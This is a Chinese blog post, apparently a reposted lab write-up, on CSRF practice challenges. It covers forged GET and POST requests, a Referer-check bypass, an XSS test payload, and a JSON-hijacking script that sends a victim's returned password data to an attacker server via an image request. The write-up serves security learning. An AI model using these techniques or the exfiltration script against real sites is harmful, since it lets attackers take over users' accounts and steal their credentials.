CSRF实战靶场 --致谢大哥

最新推荐文章于 2024-06-14 16:51:07 发布
最新推荐文章于 2024-06-14 16:51:07 发布
阅读量311 收藏
点赞数
文章标签: json javascript php ViewUI
原文链接:http://www.cnblogs.com/-zhong/p/11041653.html
版权

0X01无防护GET类型CSRF(伪造添加成员请求)

环境 靶机管理登陆 192.168.1.132

 本机 192.168.1.5

首先我们登陆 test账号 然后点击 添加用户

构造出我们的url

然后发送给已经登陆的管理员

管理 点开连接

可以看见我们添加成功

0X02无防护POST类型csrf-伪造出添加成员的请求

你想让受害者执行的页面构造poc  大哥说用burp

 

 然后 发送页面到受害者登陆了的电脑 然他点击

最后看见成功添加

0x03绕过CSRF防护之Referer检查-伪造购买商品请求

这里来讲解一下refer是什么呐??这里给你解释

https://blog.csdn.net/shenqueying/article/details/79426884

那么我们继续组合群 burp POC 然后发给admin

 

 但是出现了这样的结果 why?

这里我们在DVWA上面做过这个 可以将页面名称改为

www.csrf_demo.com.html

然后将其放到外网服务器上面去

然后构造

http://外网ip/www.csrf_demo.com.html  这样referer里面就包含和host相同的值了

这里 我们的外网ip是

http://xxxxx:2017/www.csrf_demo.com.html

然后就会购买成功

0X04配合XSS漏洞获取了用户token后进行csrf攻击(伪造添加成员请求)

这里题目告诉我们要利用xss漏洞获取用户token csrf是不可以单独获取用户的token的 所以这里我们配合xss

经过我们测试发现 username和password处都存在XSS注入

<script>alert(1)</script>

 

0X05JSON服务端情景的CSRF伪造劫持(伪造并劫持查询当前用户信息的请求)

首先我们先来了解一下什么是json 下面讲解

https://baike.baidu.com/item/JSON/2462549?fr=aladdin

任务要求

模拟出查询当前用户密码的请求链接,发送给已经登录的管理,造成csrf攻击并劫持服务端返回来的JSON信息

思路

构造查看密码连接 发给管理 让管理点击 然后我们使用json劫持 盗取从服务器返回来的密码信息 并且发送给我们的服务器

0X0A burp构造 查看密码CSRFpoc

0X0B 利用JSON劫持 并且将数据写入到我们服务器的文本中(动态注入script标签)

自定义call4back函数,来劫持数据

触发函数后 从服务器端返回json数据 然后将数据输出到前端

这里还是把我们的js脚本放在服务器上 然后用script进行跨域请求

 

访问我们的脚本代码

<html>
<head>
<script type="text/javascript"> 
    function hijack(result) { 
        var data = '';
        for(var i in result) {
            data += i + ':' + result[i];
                            }
new Image().src = "http://www.csrf_demo.com/hack.php?data=" + escape(data);//把数据发送到攻击者服务器上
                            } 
</script> 
<script type="text/javascript" src="http://www.csrf_demo.com/csrf_5.php?callback=hijack"></script> 
</body>
</html>

然后就成功执行了

 

转载于:https://www.cnblogs.com/-zhong/p/11041653.html

weixin_30791095
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRF漏洞-01】跨站请求伪造漏洞靶场实战
cc
02-19 4040
跨站请求伪造(Cross-site request forgery,CSRF)是一种攻击,它强制终端用户在当前对其进行身份验证后的web应用程序上执行非本意的操作。CSRF攻击的主要目的在伪造更改状态(修改密码、转账等)的请求,而不是盗取数据,因为攻击者无法查看对伪造请求的响应。借助社工的一些帮助(例如通过电子邮件或聊天发送链接),攻击者可以诱骗用户执行攻击者选择的操作。
一个CSRF靶场练习
NEARU的专栏
12-02 1955
CSRF_TEST xss+csrf的漏洞测试小靶场 难度递升的6个题目,第6个的技巧还是有的:正则取数据,延时请求。 靶场逻辑: 一个留言板功能(另一个上传html文件作为漏洞点)作为漏洞点+后台一个进程(admin_bot.py)模拟管理员访问留言板的内容。 文章目录CSRF_TEST代码运行poc1.get csrf2.post csrf1. 虚拟表单2. 异步请求3.JSON base...
跨站请求伪造(CSRF)漏洞简介及靶场演示
seek_2022的博客
05-10 2892
文章目录一、CSRF漏洞简介(一)什么是CSRF?(二)CSRF的原理(三)CSRF的危害二、CSRF漏洞如何挖掘?三、靶场实战(一)线上搭建环境测试(二)靶场实战四、小结 一、CSRF漏洞简介 (一)什么是CSRFCSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者"Session Riding",通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信
CSRF(跨站请求伪造)漏洞 (带靶场演示+漏洞挖掘)
最新发布
wudideaqing的博客
06-14 1366
链接点击。
CSRF靶场练习
Flynn的博客
03-22 1905
Bodhi - Client-side Vulnerability Playground CSRF
CSRF漏洞实战靶场笔记
weixin_30367543的博客
06-13 953
记录下自己写的CSRF漏洞靶场的writeup,包括了大部分的CSRF实战场景,做个笔记。 0x01无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录test用户 发现有个添加成员功能 用test账号添加发现只有admin才可以添加 现在用另一个浏览器 ,这里用的搜狗浏览器来登录admin账号 ...
CSRFTester使用方法
m0_65283068的博客
09-17 897
CSRFTester使用方法
CSRF-Protector-PHP:CSRF保护器库
05-10
" owasp/csrf-protector-php " : " dev-master " } } 然后打开终端(或命令提示符),移至项目目录并运行 composer install # # Or alternatively php composer.phar install 这会将CSRFP添加到您的项目目录中...
CSRF:ring-csrf示例
01-28
二是通过`X-CSRF-TOKEN` HTTP头发送。`ring-csrf`库提供方便的函数如`ring-csrf/token`,可以在模板渲染时插入令牌。 4. **例外处理**:当CSRF验证失败时,`ring-csrf/protect`中间件可以配置为返回特定的HTTP错误...
Bolt:CSRF扫描仪-源码
05-25
螺栓笨拙的CSRF扫描仪重要的Bolt处于测试的Beta阶段,这意味着可能存在错误。 不鼓励使用此工具。 欢迎提出请求和问题。 如果您对此仓库感兴趣,我也建议您将它放在监视中。工作流程爬行Bolt将目标网站爬网到指定的...
csrf-tester-gh-pages.zip
02-23
在这个名为"csrf-tester-gh-pages.zip"的压缩包中,我们可以推测这是一个用于测试和理解CSRF漏洞的项目,可能托管在GitHub Pages上,因为它通常用于静态网页的发布。 CSRF攻击的基本原理是攻击者诱使用户执行非预期...
CSRF漏洞防御-01
09-15
"CSRF漏洞防御-01" CSRF漏洞防御是一种非常重要的安全机制,它可以防止恶意攻击者对Web应用程序的攻击。CSRF漏洞防御主要包括四种方法:验证码防御、Referer Check防御、Anti CSRF Token防御和Token泄露。 验证码...
CSRF靶场总结
qq_51582652的博客
03-22 719
CSRF总结CSRF概述CSRF漏洞挖掘基于GET方式 的CSRFXSS攻击方式文件攻击方式基于POST方式的CSRFXSS攻击方式 CSRF概述 csrf跨站请求伪造就是伪造链接,诱导用户点击修改用户的资料,密码等内容。执行非本意的操作。Csrf侧重的是修改用户的数据,而不是盗取数据。 CSRF漏洞挖掘 当页面只有Referer请求而没有token的时候,删掉Referer还能正常请求。说明存在CSRF漏洞。 可以直接构造请求伪造去碰。 基于GET方式 的CSRF XSS攻击方式 首先先指定服务器ip
CSRF漏洞以及靶场(史上最详细)
qq_34598847的博客
10-17 1069
产生原因:服务器端没有对用户提交的数据进行严格的把控,导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器利用方式:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的原理:攻击者盗用了你的身份,以你的名义发送恶意请求危害:以受害者名义发送邮件,发消息,盗取受害者的账号,甚至购买商品,虚拟货币转账,修改受害者的网络配置(比如修改路由器DNS、重置路由器密码)等等。
PortSwigger靶场CSRF最新版详细通关记录
LawnCat的博客
02-16 1542
该文章为portswigger中CSRF中绕过token篇。
六、内网渗透测试——(4)CSRF以及靶场作业
weixin_45540609的博客
04-27 687
CSRF 1、原理 csrf:跨站请求伪造,通过伪装来自受信任用户的请求来利用受信任的网站。浏览器在用户不知情的情况下发送数据包。 成因:网站cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问该网站,都会默认已登录状态。在这期间,攻击者发送了构造好的csrf脚本或包含csrf的链接,可能会执行一些用户不想做的功能。 ​ csrf需要适当的诱骗,因为csrf的代码是针对单一网站的。 exp:攻击脚本 poc:验证脚本 2、快速利用CSRF 用Burp抓包,.
pikache靶场通关——CSRF攻击
p36273的博客
07-01 1494
靶场一共又三关,现在我们就来通关吧。
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 1157
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
pikachu靶场通关之CSRF
Python毕设源码程序王哥
04-12 1500
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
csrf dvwa靶场
09-13
在 DVWA 靶场中,你可以练习和测试 CSRF 攻击。它提供了一些漏洞和弱点,供你进行实验和学习,包括 CSRF 攻击。你可以使用 DVWA 来了解和理解如何利用此类漏洞,并学习如何防止和保护应用程序免受 CSRF 攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值